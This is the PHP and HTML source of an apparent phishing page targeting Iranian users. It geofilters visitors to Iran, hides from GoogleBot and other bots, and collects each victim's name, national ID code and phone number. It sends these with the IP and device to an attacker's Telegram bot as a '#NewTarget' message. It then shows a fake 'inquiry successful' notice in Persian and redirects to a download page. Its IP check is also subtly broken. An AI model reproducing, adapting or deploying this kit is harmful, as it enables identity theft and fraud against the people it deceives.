<?php

function ip_iran($ip)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, "http://ip-api.com/csv/" . $ip);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $exec = curl_exec($curl);
    curl_close($curl);
    $explode = explode(",", $exec);
    
    if (strtolower($explode[1]) == "iran")
    {
        return true;
    }
    else
    {
        return false;
    }
    
    return $explode[1];
}


   if(ip_iran($_SERVER['REMOTE_ADDR']) == 'Iran')
    {
    }
    else
    {
        header('Location: 403.html');
    }
include('antibots.php');
include('info.php');

if(strpos($_SERVER['HTTP_USER_AGENT'], 'GoogleBot') !==false) {
    header('HTTP/1.0 404 Not Found');
    exit();
}

if (checkbots() == true){
    header('HTTP/1.0 404 Not Found');
    exit();
}

$name = $_POST['name'];
$cm = $_POST['cm'];
$number = $_POST['number'];
   


function GetIp()
{
    $ip = $_SERVER['REMOTE_ADDR'];
    return $ip;
}
$ip = GetIp();
$Device = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[4], ")");

        
$userAgent = $_SERVER['HTTP_USER_AGENT'];

        $message = "
🏦 #𝐍𝐞𝐰‌𝐓𝐚𝐫𝐠𝐞𝐭 
🔻🔻🔻🔻🔻🔻
• Name : `$name`
• CD Meli: `$cm`
• number: `$number`
➖➖➖➖➖
• IP : $ip
• Device : $Device
➖➖➖➖➖
@X405U7 🛜 ";
		$x=urlencode($message);

file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?parse_mode=markdown&chat_id=$ID&text=" . urlencode($message));
    
        i($x);



    
    

header('Content-Type: text/html; charset=utf-8');


?>

<!DOCTYPE html>
<html



<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<meta charset="utf-8" />
<head>


<body>



<center>
<img src="IMG/madaret.gif" width="120" height="120">


</center>

<br>
<style>
@font-face {
    font-family: myFont;
    src: url('font/Shabnam-FD.ttf');
}
body {
    font-family: myFont;
}

  h3 {
   text-align: center;
   color: #000080;
  }
</style>

<center>
     <h3 id="name">درحال بررسی اطلاعات    </h3>

<script>
    setTimeout(function() {
        document.getElementById("name").innerHTML = "استعلام موفقیت آمیز بود";
    }, 2000);
</script>
</center>

<meta http-equiv="refresh" content="5; URL=dl.php?df=">

</head>



</html>